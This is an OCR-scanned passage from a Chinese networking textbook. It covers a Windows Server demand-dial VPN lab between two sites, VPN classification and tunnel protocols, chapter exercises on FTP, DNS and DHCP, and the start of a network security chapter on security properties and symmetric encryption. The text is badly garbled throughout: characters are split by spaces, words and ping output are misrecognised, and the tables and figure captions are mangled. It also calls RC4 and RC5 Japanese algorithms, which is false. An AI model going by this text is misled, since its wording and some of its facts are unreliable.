(5) 单 击 * 下 一 步 ?按钮 配置 拔 入 凭据 。 拨 入 凭据 是 目标 网 络 VPN 服务 器 (主机 3) 接 
入 主机 2 的 凭据 ,用 户 名 是 主机 2 新 建 的 *beijing”, 密 码 根据 要 求 定义 为 “abc”, 如 图 7-73 
所 示 。 


EEEEEETE x 


撤 入 赁 区 
由 器 氢 入 这 台 服务 器 时 要 使 用 的 用 户 名 和 密码 。 


人 生生 生生 用 邮 才 下 全 生疏 抽 和 攻 会 使 用 您 所 输入 的 信息 ， 


用 PSW: [ee 
密码 所: 
确认 密码): Fr 


| 
图 7-73 配置 撤 入 凭据 
166 


第 7 章 ， 应 用 层 协 议和 网 络 服务 


(6) 单 击 * 下 一 步 ?按钮 配置 拔 出 凭据 。 拨 出 凭据 是 主机 2 接 入 目标 网 络 VPN 服务 器 
(主机 3) 的 凭据 ,根据 要 求 所 出 账号 是 "shanghai”, 密 码 是 "123”, 如 图 7-74 所 示 。 


请 求 披 号 接口 向 导 对 
技 出 贡 所 

和 远程 路 由 器 时 要 使 用 的 用 户 名 和 密码 。 

和 当代 用 的 出 所 。 这 些 其 拓 必须 和 在 远 

用 记名 QD: [shanehai 

ET 

SE): 

确认 密码 C): fr 


mm | 
图 7-74 配置 氢 出 凭据 


(7) 当 完 成 请 求 拨号 接口 向 导 后 ,选择 开始” 一 “管理 工具 ”计算 机 管理 ?命令 ,在 打 
开 的 窗口 中 的 “本 地 用 户 和 组 ”选项 组 中 可 以 看 到 主机 2 新 建 的 拨 入 凭据 账号 “beijing”, 如 
图 7-75 所 示 。 


所 计划 机 管理 
局 文件 四 操作 WW) 查看 WD) 窗口 旭 帮助 0D 
中 | 和 外 | 加 | 如 区 | 久 加 


Ga 
| 可 芭 


beijing 请 求 找 号 接口 拔 入 账户 


[is 同 

Internet 来 宾 账 户 匿名 访问 Internet 信息 服务 的 
启动 IIS 进程 账户 用 于 启动 进程 外 应 用 程序 的 Int 
CN=lli crosoft Corpora . 。 这 是 一 个 帮助 和 支持 服务 的 提供 


图 7-75 查看 拨 出 凭据 账号 


2. 配置 主机 3 VPN 服务 

按照 上 述 步 骤 在 主机 3 建立 “shanghai” 拨 号 请 求 接口 , 拨 入 和 拨 出 凭据 可 以 查阅 工作 
环境 拓扑 图 。 

3. 实验 测试 

(1) 关闭 所 有 主机 防火 墙 并 配置 主机 1 和 主机 4 的 IP 地 址 和 网 关 信息 。 

(2) 查看 主机 2 和 主机 3 的 请 求 拨号 连接 状态 ,由 于 主机 2 和 主机 3(VPN) 之 间 没 有 数 
据 传输 ,因此 请 求 拨号 连接 显示 “已 断 开 ”, 如 图 7-76 所 示 。 

(3) 主机 1 通过 ping 命令 测试 与 主机 3 的 连通 性 ,发 现在 丢失 两 个 echo 包 后 与 主机 4 
连通 。 由 于 主机 2 和 主机 3(VPN 服务 器 ) 之 间 尚 未 连接 ( 见 图 7. 76) , 故 丢 包 是 因为 建立 拨 
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文件 人 E) 操作 查看 WW) 帮助 0) 
寻 了 | 外 | 加 | 日 区 | 岛 困 


由 - 句 远程 访问 记录 


图 7-76 查看 请 求 拨号 连接 状态 


号 连接 时 发 送 和 验证 凭据 所 产生 的 延迟 。 另 外 ,TTL 值 由 默认 128 减 为 127 ,表示 主机 1 和 
主机 3 之 间 通 过 一 个 中 间 路 由 转发 ,如 图 7-77 所 示 。 


D: \WINDOWS\ m32\cad. exe - ping 202.202.1.2 


D:Docunents and Settings\Lee>yping 282.202.1.2 


Pinging 292.292.1.2 with 32 bytes of data: 


Request tined out. 
Request tined out. 


Reply fron 202.202.1.2: bytes=32 time=2nd TIL=127 
Reply from 292 .292.1.2: bytes=32 tinme<ins TIL=127 
Ping statistics for 282.282.1.2: 

Packets: Sent = 4,. Received = 2, Lost = 2《〈58x loss) 


hpproximate round trip tines in milli-seconds: 
Minimum = Bns, Maxinmnum = 2ms。 fverage = ins 


图 7-77 主机 1 与 主机 3 的 连通 性 


(4) 主机 1 通过 ping 命令 测试 与 主机 4 的 连通 性 。 当 在 步骤 (3) 中 建立 VPN 拨号 连 
接 后 ,两 内 网 主机 之 间 不 再 存在 丢 包 现象 ,此 时 TTL 值 由 默认 128 减 为 126 ,表示 主机 1 和 
主机 4 之 间 通 过 两 个 中 间 路 由 转发 ,如 图 7-78 所 示 。 


D: \¥INDOYS\systen32\cnd. exe 


Pinging [172.16.1.18 


Reply fron 172.16.1.18: 
Reply fron 172.16.1.18: 
Reply fron 172.16.1.18: 
Reply fron 172.16.1.18: 


Ping statistics for 172.16.1.18: 
Packets: Sent = 4, Received - 4, Lost = 9 (Bx loss), 
Approxinate round trip tines in milli-seconds: 
Mininun = Gns, Maxinun = Sns, fverage = ins 


到 


图 7-78 主机 1 与 主机 4 的 连通 性 


(5) 在 主机 4 上 设置 共享 文件 ,主机 1 通过 网 上 邻居 或 搜索 计算 机 可 以 访问 主机 4 共 
享 , 如 图 7-79 所 示 。 
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文件 四。 编辑 @) 查看 中“ 收 意 内 ”工具 四 帮助 0 
Oi- © - 册 |Pm lxta 回 - 
地 站 0 | 大 搜索 结果 - 计算 机 

搜索 助理 x 名称 


hr2 16 1.101 


计算 机 名 (由 : 

1172,16.1,10 

到 找 索 此 计算 机 的 文件 (5) 
加 搜索 Intemet(D 


图 7-79 主机 1 访问 主机 4 共享 


任务 总 结 和 


VPN 可 以 通过 公共 网 络 连接 远程 局 域 网 , 既 可 以 拓展 局 域 网 覆盖 范围 ,又 可 以 减少 线 
缆 铺 设 成 本 。VPN 通过 拨 入 凭证 检验 接 人 服务 器 的 合法 性 ,因此 一 个 服务 器 的 拨 出 凭证 必 
须 和 目标 服务 器 的 拨 和 凭证 相 吻合 ,否则 VPN 服务 器 之 间 无 法 建立 连接 。 


4 知识 拓展 


VPN(Virtal Private Network) 虚 拟 专用 网 是 一 条 利用 Internet 传输 私有 网 络 数 据 的 安 
全 通道 。 通 过 对 传输 数据 封包 和 加 密 ,远程 局 域 网 之 间 在 公共 网 络 中 建立 一 条 临时 专用 连 
接 ,从 而 在 公 网 上 安全 地 传输 私有 数据 。 通常 VPN 用 于 企业 内 部 网 络 的 扩展 ,如 图 7-80 所 
示 , 通 过 VPN ,出 差 员 工 \ 公 司 异 地 办 事 处 、 合 作 伙伴 及 分 支 机 构 之 间 可 以 连接 成 遇 辑 上 的 
统一 网 络 , 安 全 地 传输 私有 数据 。 


图 7-80 ”VPN 的 定义 


VPN 分 类 : VPN 根据 业务 形式 有 不 同 分 类 标准 , 按 用 户 接 入 方式 可 以 分 为 专线 VPN 
和 拨号 VPN, 按 协议 层次 可 以 分 为 第 二 层 隧 道 VPN 和 第 三 层 隧道 VPN。 
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(1) 按 用 户 接 入 方式 划分 : 用 户 可 以 通过 专线 上 网 ,也 可 以 是 拨号 上 网 ,根据 不 同 接 入 
方式 VPN 可 以 分 为 专线 VPN 和 拨号 VPN。 

专线 VPN 通过 固定 线路 连接 到 ISP, 为 已 经 通过 专线 接 入 ISP 边缘 路 由 器 的 用 户 提 供 
VPN 解决 方案 ,是 一 种 “永远 在 线 ” 的 VPN, 可 以 节省 用 户 长 途 专线 接 入 费用 。 拨 号 VPN 
是 为 拨号 用 户 提供 的 VPN 业务 ,是 一 种 “ 按 需 连接 "的 VPN, 漫 游 用 户 通过 拨号 连接 (如 模 
拟 电话 ISDN 和 ADSL 等 ) 连 接 到 ISP, 再 接 入 VPN。 

(2) 按 协 议 类 型 划分 : VPN 按 隧道 协议 和 网 络 分 层 可 以 划分 为 第 二 层 隧 道 VPN 和 第 
三 层 隧 道 VPN ,两 者 的 主要 区 别 在 于 数据 在 网 络 协议 栈 的 封装 层次 。 

第 二 层 隧 道 VPN 采用 的 协议 包括 点 到 点 隧道 协议 (PPTP)@ 第 二 层 转发 协议 (L2F)@ ,第 
二 层 隧 道 协议 (L2TP) 和 多 协议 标记 交换 (MPLS) 等 。 第 三 层 隧 道 VPN 采用 的 协议 有 通用 路 
由 封装 协议 (GRE)@ 和 IP 安全 (IPSec) 协 议 @。 其 中 ,GRE IPSec 和 MPLS 主要 用 于 实现 专线 
VPN 业务 ,L2TP 主要 用 于 实现 拨号 VPN 业务 。VPN 隧道 的 实现 技术 和 区 别 见 表 7-3。 


表 7-3 VPN 隧道 的 实现 技术 和 区 别 


技术 


特性 GRE IPSec L2TP L2F 
TT 
参与 构成 VPN 的 币 训 的 证 VPN， | 可 作为 RFC2547 吉 构 成 -VEDN 可 作为 L2VPN 
形式 可 作为 REC2547 下 LSP ne” 隧道 的 替代 或 L3VPN 的 隧道 
隧道 的 替代 隧道 
可 承载 报 文 类 型 “|IP IPX .MPLS IP PPP MPLS 标签 报 文 
拓扑 | Access 接 人 | 不 支持 不 支持 支持 不 支持 
连接 | Site-to-Site | 支持 支持 不 支持 支持 
有 以 纯粹 GRE 构建 的 L3 | 以 纯粹 IPSec 构建 i ee 
正 地 址 私有 性 | VPN 不 能 保证 的 13 VPN 不 能 保证 | 可 以 保证 本 佬 全 
不 能 保证 ,可 以 通过 到 | 不 能 保证 ,可 以 通 不 能 保证 ,需要 
隧道 连通 性 对 端的 路 由 来 检测 连 | 过 IKE 的 生存 时 间 | 可 以 保证 通过 路 由 来 检 
通 性 来 检测 连通 性 测 连通 性 
非常 弱 , 可 以 通过 GRE | 很 强 的 安全 性 , 可 | 简单 的 隧道 身份 认 
安全 性 Over IPSec (传输 模式 ) | 以 静态 配置 ,也 可 | 证 机 制 ,可 以 和 | 无 
来 增强 其 安全 性 以 通过 IKE 配置 ”| IPSec 结合 
有 简单 的 滑动 窗口 | Devp Tm 
i i 了 与 RSVP-TE 一 
QoSs 特性 本 身 没 有 ,可 以 使 用 IP| 本 身 没 有 ,可 以 使 | 机 制 ,可 进行 拥塞 起 使 用 ,有 很 强 


QoS 特性 


用 IP QoS 特性 


和 流量 控制 ; 不 能 
保证 带宽 


的 QoS 特性 


@ ”PPTP(Point-to-Point Tunneling Protocol) 点 到 点 隧道 协议 用 于 远程 客户 通过 拨号 方式 接 人 VPN。 用 户 通过 二 次 拨 
号 连接 PPTP 服务 器 ,建立 PPTP 传输 连接 ,数据 按 先进 先 出 原则 在 连接 中 传输 , 称 为 PPTP 隧道 
@@ 第 二 层 转发 协议 (L2F) 由 思科 公司 提出 ,通过 拨号 服务 器 和 拨号 协议 建立 跨越 公 网 的 安全 隧道 ,为 远程 用 户 与 企业 
网 络 之 间 提 供 虚 拟 点 对 点 连接 。 
加 ”GRE 是 VPN 第 三 层 隧道 协议 ,了 道 是 一 个 虚拟 的 点 到 点 连接 ,两 端 分 别 对 数据 报 进行 封装 及 解 封 装 操作 实现 隧 
道 。GER 不 涉及 数据 加 密 ,不 能 防止 网 络 侦 听 和 泄密 ,在 实际 中 往往 结合 IPSec 一 起 使 用 。 
@ 第 二 层 隧 道 协 议 只 能 保证 联 道 发 生 端 及 终止 端 进行 认证 及 加 密 ,而 隧道 在 公共 网 络 传输 并 不 能 完全 保证 安全 。 
IPSec 加 密 技术 则 是 在 隧道 外 层 再 次 封装 ,保证 隧道 在 传输 过 程 中 的 安全 性 。 
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本 章 人 小 结 


本 章 通过 真实 的 工作 任务 带动 应 用 层 服务 规划 安装 .配置 和 管理 过 程 , 既 有 具体 操作 
细节 ,又 有 相关 理论 介绍 ,要 求 初学 者 从 理论 上 把 握 高 度 , 从 实践 上 加 深 认 知 ,平时 做 到 多 思 
考 .多 动手 ,多 总 结 ,从 而 达到 知 与 行 的 统一 。 


思考 练习 题 
一 、 填空 题 
1. FTP 连接 方式 分 为 主动 模式 和 被 动 模式 ,其 中 PORT 模式 属于 
2. 在 域名 “www. 163. com” 中 ,com 是 通用 顶层 域名 ,表示 ; www 是 
,表示 提供 Web 服务 。 
3. FTP 数据 传输 模式 有 两 种 ,分 别 是 ASCII 模式 和 
4. DNS 正 向 查找 区 域 用 于 将 转换 为 
二 、 选 择 题 
1. FTP 服务 器 默认 使 用 端口 是 。 
A. 20 B. 21 C. 53 D. 80 
2. 中 国 项 层 域名 是 
A. CN B. CH C. CHN D. CHINA 
3. 默认 Web 服务 端口 是 和 
A. 21 B. 22 C. 80 D. 81 
4. 当 客户 机 再 向 DHCP 服务 器 发 出 DHCPDISCOVER 请 求 时 ,将 采取 址 作 
为 目的 地 址 发 送 给 服务 器 。 
A. 服务 器 IP B. 客户 机 IP C. 0.0.0.0 D255. 055255; 255 
5. 下 列 IP 属于 自动 专用 地 址 段 随机 的 是 
A. 192.168.1.10  B. 172.16.1.10 C. 169.254.1.10 D. 169.1.1.10 
6. 下 列 对 网 络 服务 的 描述 错误 的 是 。 


A. DHCP 是 动态 主机 配置 协议 ,动态 分 配 IP 地 址 
B. DNS 是 域名 服务 ,可 将 主机 域名 解析 为 IP 地 址 
C. WINS 是 Windows 互联 网 名 称 服务 ,可 提供 电子 邮件 的 发 送 服务 
D. FTP 是 文件 传输 协议 ,可 提供 文件 上 传 、 下 载 服 务 
7. 在 通常 情况 下 , 当 DHCP 客户 的 IP 地 址 租用 期 满 后 ,客户 机 会 。 
A. 继续 使 用 该 IP 地 址 
B. 使 用 专用 IP 自动 编 址 
C. 广播 DHCPREQUEST 消息 请 求 续 租 
D. 重新 启动 租用 过 程 来 租用 新 的 IP 地 址 
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8. 小 明 在 公司 查询 域名 “www. tsinghua. edu. cn” 所 对 应 的 IP 地 址 时 ,查询 顺序 


是 
(1) 客户 端 计算 机 上 设置 的 “首选 DNS 服务 器 ” 
(2) 查询 ROOT DNS 服务 器 
(3) 查询 . CN 域 的 DNS 服务 器 
(4) 查询 .EDU. CN 域 的 DNS 服务 器 
(5) 查询 .TSINGHUA.EDU. CN 域 的 DNS 服务 器 
A. 12345 B. 13452 C. 15234 D. 54321 
9. DNS 服务 器 上 “区 域 文 件 " 是 用 来 5 
A. 保存 DNS 服务 器 所 管辖 的 区 域内 的 主机 的 相关 记录 
B. 保存 DNS 服务 器 的 启动 参数 
C. 保存 DNS 服务 器 所 管辖 的 区 域名 称 
D. 以 上 都 不 正确 
10. DHCP 默认 租约 是 天 ,客户 端 第 一 次 更 新 租约 是 在 租约 期 限 的 
A. 8,50% B. 4,87.5% C. 8,87.5% D. 4,50% 
11. 国内 一 家 高 校 要 建立 www 网 站 ,其 域名 的 后 级 应 该 是 . 
A. .COM B. .EDU.CN C. .COM.CN D; ,NET 
12. 在 计算 机 名 为 "huayu" 的 Windows Server 2003 服务 器 上 , 当 利 用 IIS 搭建 好 FTP 
服务 器 后 ,建立 用 户 “jacky”, 密 码 为 "123”, 可 以 输入 直接 用 IE 访问 。 
A. http://jacky:123@huayu B. ftp://123:jacky@ huayu 
C. ftp://jacky:123@huayu D. http://123:jacky@huayu 
13. 在 DHCP 租约 过 程 中 , 当 客户 请 求 IP 时 ,选用 作为 源 地 址 ， 作为 
目的 地 址 。 
A. 0.0.0.0, 广 播 地 址 B. 广播 地 址 ,127. 0.0.1 
C. 127. 0. 0. 1, 广 播 地 址 D. 广播 地 址 
14. FTP 服务 数据 连接 端口 是 。 
A. 20 B. 21 G3 D. 80 
三 、 简 答题 
1. 简 述 FTP 服务 器 中 主动 模式 和 被 动 模式 的 区 别 。 
2. 简 述 DNS 服务 器 迭代 查询 过 程 。 
3. 简 述 DHCP 工作 原理 。 
4. 简 述 DHCP 客户 端 更 新 IP 地 址 租约 的 过 程 。 
四 、 综 合 实验 
1. 实验 要 求 。 
小 张 是 企业 网 络 工 程 部 技术 人 员 , 因 业务 需求 在 上 海 和 北京 建立 子 公司 ,并 实现 以 下 
要 求 。 


(1) 主机 2, 主机 3 和 主机 5 可 以 相互 连通 。 
(2) 主机 5 配置 DNS 服务 ,其 中 主机 1 域名 是 ”www. baidu. com”, 主 机 4 域名 是 “ftp. 


baidu. com”。 
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(3) 主机 2 和 主机 3 配置 NAT 服务 ,主机 1 能 连通 主机 4, 并 且 可 以 访问 主机 4 共享 
文件 ; 

(4) 主机 2 配置 NAT 服务 ,通过 IP“202. 202. 1. 1? 对 外 发 布 主机 1 Web 站 点 。 

(5) 主机 3 配置 NAT 服务 ,通过 IP*116. 64. 1. 3” 对 外 发 布 主机 4 FTP 站 点 。 

(6) 主机 6 可 以 通过 域名 “http://www. baidu. com” 访 问 主机 1 Web 站 点 。 

(7) 主机 6 可 以 通过 域名 “Ftp://ftp. baidu. com” 访 问 主 机 4 FTP 站 点 。 

2. 实验 拓扑 。 
主机 2 和 主机 3 内 置 两 个 网 卡 , 主 机 5 内 置 3 个 网 卡 , 如 用 物理 机 做 实验 则 所 有 主机 之 
间 通 过 交叉 线 直接 连接 ,如 用 虚拟 机 做 实验 则 要 注意 配置 网 卡 Vnet 名 称 。 具 体 工 作 环 境 
拓扑 图 如 图 7-81 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 


a ~ 一 ~ 


- 、 - 、 
人 ye Se 
所 4 设置 共享 “、 
\ 
人 访问 共享 、 / ey "mt \\ 
Vnetl 网 卡 Web 服 务 器 \\\ /FTP 服 务 器 | ip:172.16.110 AN 
/IP，192.168.1.10 域名 : www.baidu.com / 域名 ftp.aidu.com | Mask: 255.255.255.0 \ 
1/ Mask: 255.255.255.0 | Win2003 ~ H Gateway: 172.16.1.1\ 
1 Gateway: 192.168.1.1 \ 和 由 
1 上 海 1 北京 
上 1 
上 1 1 1 
1 1 1 1 
\ Vanetl 网 卡 Vanet3 网 卡 1 \ vnet4 网 卡 Vnet3 网 卡 / 
\ IP: 192.168.1.1 IP: 202.202.1.1 \ IP: 116.64.1.3 IP: 172.16.1.1 1 
\Mask: 255.255.255.0| Mask: 255.255.255. 0/ Vnet3 网 卡 Vnet4 网 卡 。\Mask，255.255.255.0| Mask: 255.255.255.0/ 
/1P: 202.202.1.2¢ IP: 116.64.1.2 \ , 
SN 
Re Mask: 255.255.255.0 ES Mask: 255.255.255.0 给 
Se ‘ 

“、、 上 海 VPN 服 务 器 2 Vanets 网 卡 | ntemet 路 由 器 北京 VPN 服 务 器 2 
“NAT 服 务 器 ，Win2008- IP: 203.203.1.1| DNS 域名 服务 器 “NNAT 服 务 器 ， Win2008. 7 
a Mask: 255.255.255.0| a 

Vnet5 网 卡 
IP: 203.203.1.2 
Mask: 255.255.255.0 
Gateway: 203.203.1.1 
DNS: 203.203.1.1 
主机 名 称 操作 系统 IP 地 址 承担 角色 拨 出 凭据 拨 入 凭据 
主机 1 Windows 2003 ”|192.168.1.10(Vnet1)| ”Web 服 务 器 
< 192.168.1.1(Vnet1) | NAT 服务 器 ”| 账号 : Shanghai | 账号 : Beijing 
a 
主 术 Windows 2003 |202 202.11(Vnet3) | VPN 服 务 器 | 密码 : 123 密码 :abc 
116.64.1.3(Vnet4) | NAT 服务 器 ”| 账号 : Beijing | 账号 : Shanghai 
主机 3 Windows 2003 |172.16.1.1(Vnet2) | VPN 服 务 器 | 密码 ，abe 密码 : 123 
主机 4 Windows 2003 “| 172.16.1.10(Vnet2) | ”ftp 服务 器 
2.21 
_ 202.202.1.2(Vnet3) | ”路 由 器 
主机 5 Windows 2003 116.64.1.2(Vnet4) 
203.203.1.1(Vnet5) | DNS 服务 器 
主机 6 Windows XP 203.203.1.2(Vnet5) 


图 7-81 实验 拓扑 图 
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随 着 世界 经 济 一 体 化 的 加 速 发 展 ,计算 机 网 络 因 其 对 经 济 发 展 及 人 们 生活 方式 的 改变 
在 整个 行业 中 异军突起 ,从 而 引发 的 黑客 攻击 、 网 络 威胁 等 安全 问题 日 益 突 出 。 另 外 ,目前 
国际 局 势 云 波 诡 育 ,周边 国家 都 加 大 对 中 国信 息 搜集 的 力度 ,包括 军事 、 经 济 、 政 治 等 各 方 
面 ,一 场 以 信息 化 为 主导 的 网 络 信息 战 阵 愈 演 愈 烈 , 中 国 仍 是 遭受 黑客 攻击 最 大 的 受害 国家 
这 二， 

网 络 已 经 无 所 不 在 地 影响 着 社会 政治 .经 济 文化 .军事 ,意识 形态 和 社会 生活 等 各 个 方 
面 ,关系 到 国家 安全 ,主权 统一 、 社 会 稳定 .民族 文化 。 洞 悉 网 络 入侵, 检测 人 侵 行为 ,做 好 安 
全 防范 是 中 国 和 平 崛起 的 必 经 之 路 。 

本 章 主要 简 述 目前 网 络 安全 威胁 分 类 ,以 真实 的 工作 过 程 带动 理论 的 展开 ,采取 先 攻 后 
防 , 攻 中 有 防 .攻防 结合 的 讲述 模式 ,让 学 生 从 攻击 中 寻求 解决 方案 ,由 攻击 中 掌握 防范 方 
法 ,在 攻击 中 汲取 宝贵 经 验 , 提 高 安全 意识 ,加 强 职业 素养 ,从 而 起 到 举一反三 .事半功倍 的 
学 习 效 果 。 


1. 知识 目标 

(1) 识 记 计算 机 网 络 安全 的 定义 。 

(2) 识 记 网 络 入侵 的 七 大 步骤 。 

(3) 理解 对 称 加 密 算法 和 非 对 称 加 密 算法 的 区 别 。 
(4) 理解 恶意 代码 的 分 类 。 

2. 能 力 目标 

(1) 掌握 网 络 入 侵 的 基本 步骤 。 

(2) 掌握 基于 文件 共享 漏洞 的 入 侵 过 程 和 防范 措施 。 
(3) 掌握 数据 恢复 工具 的 使 用 。 

(4) 掌握 防范 黑客 入 侵 的 基本 方法 。 


8.1 网 络 安全 定义 


计算 机 网 络 安全 是 一 门 涉 及 计算 机 技术 、 融 合 通 信和、 信息 安全 ,密码 学 等 内 容 的 综合 
学 科 。 从 狭义 来 讲 , 它 是 指 网 络 上 信息 安全 ; 从 广义 来 说 ,凡是 涉及 网 络 上 信息 保密 性 、 完 
整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 和 理论 都 是 网 络 安全 研究 领域 。 随 着 科学 技术 的 
不 断 发 展 ,人 们 对 网 络 安 全 也 提出 了 新 的 要 求 ,主要 如 下 。 
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1. 可 靠 性 (Reliability) 

可 靠 性 是 指 网 络 信息 系统 能 够 在 规定 条 件 下 和 规定 时 间 内 完成 规定 功能 。 可 靠 性 是 系 
统 安全 最 基本 要 求 , 是 所 有 网 络 信息 系统 建设 和 运行 目标 。 网 络 信息 系统 的 可 靠 性 度量 主 
要 有 抗 毁 性 .生存 性 和 有 效 性 3 种 。 

(1) 抗 毁 性 是 指 系统 在 人 为 破坏 下 的 可 靠 性 。 例 如 ,部 分 线路 或 节点 失效 后 网 络 系统 
能 否 提供 原 有 服务 。 增 强 抗 毁 性 可 以 有 效 地 避免 因 各 种 灾害 (战争 、 地 震 等 ) 造 成 的 大 面积 
瘫痪 事件 。 

(2) 生存 性 是 在 随机 破坏 下 系统 的 可 靠 性 。 生 存 性 主要 反映 随机 性 破坏 和 网 络 拓扑 结 
构 对 系统 可 靠 性 的 影响 。 这 里 的 随机 性 破坏 是 指 系统 部 件 因 自 然 老化 等 造成 的 自然 失效 。 

(3) 有 效 性 是 一 种 基于 业务 性 能 的 可 靠 性 。 有 效 性 主要 反映 网 络 信息 系统 部 件 在 失效 
情况 下 满足 业务 需求 的 程度 。 例 如 ,网 络 部 件 失效 虽然 没有 引起 连接 性 故障 ,但 会 造成 质量 
指标 下 降 ,如 平均 延 时 增加 ` 线 路 阻塞 等 。 

2. 保密 性 (Confidentiality) 

保密 性 是 保证 计算 机 及 网 络 系统 硬件 .软件 和 数据 不 被 非 授 权 用 户 访问 。 它 是 在 可 靠 
性 和 可 用 性 基础 之 上 ,保障 网 络 信息 安全 的 重要 手段 。 保 密 技 术 包 括 以 下 几 种 。 

(1) 物理 保密 : 利用 物理 手段 ,如 限制 .隔离 .掩蔽 等 措施 保护 数据 不 被 泄露 。 

(2) 防 辐射 : 防止 数据 以 电磁 波及 其 他 方式 辐射 出 去 。 

(3) 信息 加 密 : 通过 加 密 算法 对 明文 数据 进行 加 密 , 即 使 密 文 泄露 也 无 法 读 取 其 中 
信息 。 

3. 完整 性 (Integrity) 

完整 性 是 指 确保 信息 在 传递 过 程 中 的 真实 性 和 准确 性 , 即 防止 在 数据 存储 或 传输 过 程 
中 对 其 进行 插入 、 删 除 或 乱 序 等 操作 。 完 整 性 是 一 种 面向 信息 的 安全 性 , 它 要 求 保持 信息 原 
样 , 即 信 息 的 正确 生成 和 存储 传输 。 完 整 性 与 保密 性 不 同 , 保 密 性 要 求 信息 不 被 泄露 给 未 授 
权 用 户 ,而 完整 性 则 要 求 信息 不 受到 各 种 原因 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 设 
备 故 障 、 误 码 、 人 为 攻击 和 计算 机 病毒 等 。 

4. 可 用 性 (Availability) 

网 络 信 息 系 统 的 最 基本 功能 是 向 用 户 提供 服务 ,而 用 户 需 求 是 随机 的 、 多 方面 的 。 可 用 
性 是 保证 授权 用 户 在 任何 时 间 、 任 何 地 点 都 能 访问 系统 资源 而 不 受 限 制 , 即 网 络 信息 服务 多 
许 授权 用 户 或 实体 使 用 的 特性 。 可 用 性 还 应 该 满足 以 下 要 求 。 

(1) 身份 验证 是 确保 用 户 身 份 的 合法 性 和 真实 性 以 及 用 户 是 否 有 权 使 用 网 络 资源 。 身 
份 验证 可 以 通过 用 户 名 和 密码 认证 ,也 可 以 通过 数字 签名 ,甚至 指纹 . 音 纹 等 识别 。 

(2) 访问 控制 是 指 通过 配置 控制 策略 限制 客体 对 资源 进行 的 不 同 程度 的 授权 访问 ,用 
户 只 能 访问 相应 权限 资源 ,防止 和 限制 非 授权 用 户 的 非法 访问 。 访 问 控制 用 于 系统 管理 员 
控制 用 户 对 服务 器 目录、 文件 等 网 络 资源 的 访问 : 防止 非法 的 主体 进入 受 保护 的 网 络 资 
源 ; @ 允 许 合法 用 户 访 问 受 保护 的 网 络 资源 ; @ 防 止 合法 的 用 户 对 受 保护 的 网 络 资源 进行 
非 授 权 的 访问 。 

(3) 业务 流 控 制 是 利用 均 分 网 络 负荷 ,防止 业务 流量 过 度 集中 引起 的 网 络 阻塞 。 

(4) 审计 跟踪 是 把 网 络 信息 系统 中 发 生 的 所 有 安全 事件 存储 在 安全 审计 跟踪 之 中 ,以 
便 分 析 事故 原因 ,划分 事故 责任 ,并 及 时 采取 措施 。 
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5. 不 可 否认 性 (Non-repudiation) 

不 可 否认 性 也 称 不 可 抵赖 性 , 是 指 通 信 在 信息 交互 过 程 中 任何 一 方 都 不 能 否认 自己 发 
送信 息 的 行为 和 信息 内 容 , 即 不 能 否认 或 抵赖 本 人 对 数据 的 任何 操作 。 不 可 否认 性 有 了 时 需 
要 依靠 第 三 方 支持 。 

6. 可 控 性 (Controllability) 

可 控 性 是 对 网 络 信息 传播 及 内 容 具 有 控制 能 力 。 


8.2 ”网络 安全 技术 


网 络 安全 是 一 个 相对 概念 ,不 存在 绝对 的 安全 ,所 以 必须 未 雨 绸 缪 、 居 安 思 危 。 同 时 , 安 
全 威胁 是 一 个 动态 过 程 ,不 可 能 根除 威胁 , 唯 有 积极 防御 、 有 效应 对 。 从 技术 上 讲 , 任 何 一 个 
单独 体系 都 无 法 确保 网 络 信息 的 安全 ,网 络 安全 防护 由 多 种 技术 共同 承担 。 目 前 ,网 络 安全 
技术 主要 有 信息 加 密 ,数字 签名 、 防 病毒 ,防火墙 和 入 侵 检测 技术 。 


8.2.1 数据 加 密 技术 


数据 加 密 技术 是 利用 数学 或 物理 方法 对 传输 信息 进行 保护 ,防止 泄露 的 技术 。 数 据 经 
加 密 成 密 文 后 ,即使 被 截获 ,但 由 于 不 知道 具体 加 密 算 法 和 密 钥 故 也 无 法 还 原初 始 数据 ,从 
而 保证 了 数据 的 保密 性 。 数 据 在 加 解密 过 程 中 ,根据 收发 双方 密 钥 是 否 相 同 可 将 加 密 技 术 
分 为 两 类 ,分 别 是 对 称 加 密 和 非 对 称 加密 。 

在 对 称 加 密 算法 中 :收发 双方 使 用 相同 密 钥 ,也 就 是 说 加 密 和 解密 采用 相同 密 钥 。 发 送 
方 将 初始 数据 加 密 成 密 文 后 连同 密 钥 传输 至 接收 方 ,接收 方 再 使 用 相同 密 钥 和 算法 将 密 文 
逆向 还 原 成 明文 ,例如 图 8-1 所 示 的 异 或 对 称 加 密 算法 实例 。 

发 送 方 


OA 0 | | | 
上 1 上 1 1 
@ 扩 频 后 信号 ， | | ! ne - 
1 1 1 10 | 1 1 
1 上 1 1 
二 1 上 上 1 1 
@g | lo [lol rr rlol lortolrlo fr lo 
| 1 1 1 
1 1 1 
1 1 
1 1 1 
1 1 1 
1 人 1 
1 和 1 


图 8-1 异 或 对 称 加 密 算法 实例 
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(1) 发 送 方 将 明文 数据 *1011” 转 换 为 数字 信号 准备 加 密 。 

(2) 发 送 方 根据 加 密 等 级 将 明文 扩 频 , 扩 频 倍数 越 大 密 文 长 度 越 长 ,保密 性 越 好 。 在 本 
例 中 ,将 明文 扩 频 为 原来 4 倍 。 

(3) 收发 双方 根据 算法 协商 伪 随 机 比特 流 , 伪 随 机 比特 流 由 一 定 公 式 算法 生成 ,将 其 称 
为 密 钥 。 

(4) 发 送 方 将 扩 频 后 的 信号 通过 密 钥 * 异 或 "加密 ,得 到 密 文 并 传输 至 接收 方 。 

(5) 接收 方 生 成 与 发 送 方 事先 协商 的 密 钥 。 

(6) 接收 方 将 密 文 再 一 次 通过 密 钥 进 行 “ 异 或 ”解密 ,得 到 扩 频 4 倍 后 的 信号 。 

(7) 接收 方 将 扩 频 后 的 信号 压缩 还 原 成 明文 。 

在 本 例 加 密 中 ,加 密 密 钥 和 解密 密 钥 相同 ,由 收发 双方 协商 。 加 密 算 法 采用 “ 异 或 " 算 
法 ,算法 可 以 公开 ,但 密 钥 不 能 公开 。 

对 称 加 密 算 法 是 应 用 较 早 的 加 密 算法 ,代表 算法 有 美国 DES 算法 、 欧 洲 IDEA 算法 以 
及 日 本 RC4、RC5 算法 。 对 称 加 密 算法 保密 性 一 般 , 但 是 加 密 速 度 快 ,适用 于 对 大 量 数据 进 
